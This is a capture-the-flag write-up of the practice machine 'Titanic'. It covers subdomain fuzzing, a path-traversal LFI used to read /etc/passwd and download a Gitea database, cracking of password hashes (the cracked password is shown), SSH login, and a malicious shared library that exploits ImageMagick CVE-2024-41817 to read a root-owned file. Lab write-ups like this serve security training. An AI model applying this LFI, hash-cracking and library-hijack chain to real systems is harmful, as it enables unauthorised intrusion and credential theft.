Introduction

OS: Linux
Difficulty: Easy
Points: 20
Release: 16 Feb 2025
IP: 10.10.11.55

⚙️ Enumeration & Initial Access

🔍 Nmap Scan

1
2
3
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Apache httpd 2.4.52
  • 22 – SSH
  • 80 – Apache Web Server

The hostname titanic.htb was added to /etc/hosts.

🌐 Web Enumeration

The web application appears to be a ticket booking system with no immediately obvious vulnerabilities. I then enumerated subdomains using ffuf:

1
2
ffuf -u http://titanic.htb/ -H "Host: FUZZ.titanic.htb" \
     -w ../../wordlists/SecLists/Discovery/DNS/subdomains-top1million-110000.txt -fw 20

Found a valid subdomain:

1
dev [Status: 200, Size: 13982, Words: 1107, Lines: 276, Duration: 53ms]

📁 Gitea Source Leak

Navigating to http://dev.titanic.htb/ revealed an exposed Gitea instance with source code and docker files.

htb-titanic-1.png

After analyzing the code, I identified a Local File Inclusion (LFI) vulnerability in:

1
http://titanic.htb/download?ticket=

Confirmed by fetching /etc/passwd:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
curl "http://titanic.htb/download?ticket=../../../../etc/passwd"
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
developer:x:1000:1000:developer:/home/developer:/bin/bash
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
_laurel:x:998:998::/var/log/laurel:/bin/false

🗃️ Gitea DB Extraction via LFI

Attempting to access the SSH private key for developer failed.

Knowing Gitea is installed under the developer user, I attempted to download the Gitea database:

1
wget "http://titanic.htb/download?ticket=../../../../home/developer/gitea/data/gitea/gitea.db"

htb-titanic-2.png

🔓 User Access

To crack the Gitea hashes, I followed this guide:
🔗 unix-ninja: Cracking Gitea PBKDF2

1
sqlite3 gitea.db 'select salt,passwd from user;' | ./gitea2hashcat.py

Example output:

1
sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=

Cracked using Hashcat:

1
2
3
4
5
6
7
8
9
10
hashcat gitea.hashes --show --user
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:

10900 | PBKDF2-HMAC-SHA256 | Generic KDF

NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.

developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=:25282528

Got the developer password: 25282528

SSH login successful

1
ssh developer@titanic.htb

✅ Logged in successfully and obtained the user flag.

1
2
cat user.txt
7090417266c81a932256846xxxxxxxxxxx

🚀 Root Access

Discovered a script that identifies images using ImageMagick:

1
cat /opt/scripts/identify_images.sh
1
2
3
cd /opt/app/static/assets/images
truncate -s 0 metadata.log
find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify >> metadata.log

Metadata output:

1
2
cat metadata.log
/opt/app/static/assets/images/home.jpg JPEG 1024x1024 ...

ImageMagick version:

1
2
/usr/bin/magick --version
# ImageMagick 7.1.1-35

💥 CVE-2024-41817: ImageMagick RCE

This version of ImageMagick is vulnerable to a recent RCE. Reference:
🔗 CVE-2024-41817 Exploit Guide

🛠️ Exploitation Steps:

Compile malicious shared library:

1
2
3
4
5
6
7
8
9
10
11
cd /opt/app/static/assets/images

gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){
    system("cat /root/root.txt >> /tmp/root");
    exit(0);
}
EOF

Waited for the image script to execute. Verified output:

1
2
3
developer@titanic:/opt/app/static/assets/images$ cat /tmp/root
24fdc646904035671dd5e3fxxxxxxxxx
developer@titanic:/opt/app/static/assets/images$

🎉 Got the root flag!